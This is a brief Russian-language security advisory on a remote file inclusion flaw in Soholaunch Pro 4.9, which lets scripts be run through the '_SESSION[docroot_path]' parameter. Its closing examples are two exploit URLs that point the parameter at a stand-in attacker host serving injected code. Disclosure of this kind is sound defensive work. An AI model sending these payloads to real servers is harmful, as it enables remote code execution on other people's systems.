Программа: Soholaunch Pro 4.9
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «_SESSION[docroot_path]» различными сценариями. Атакующий может выполнить произвольный сценарий на целевой системе в контексте безопасности запущенного Web сервера.
Примеры:
http://target.com/sohoadmin/program/includes/shared_functions.php ?_SESSION[docroot_path]=http://attacker.com/inject.txt?
http://target.com/sohoadmin/client_files/shopping_cart/pgm-shopping _css.inc.php?_SESSION[docroot_path]= http://attacker.com/inject.txt?
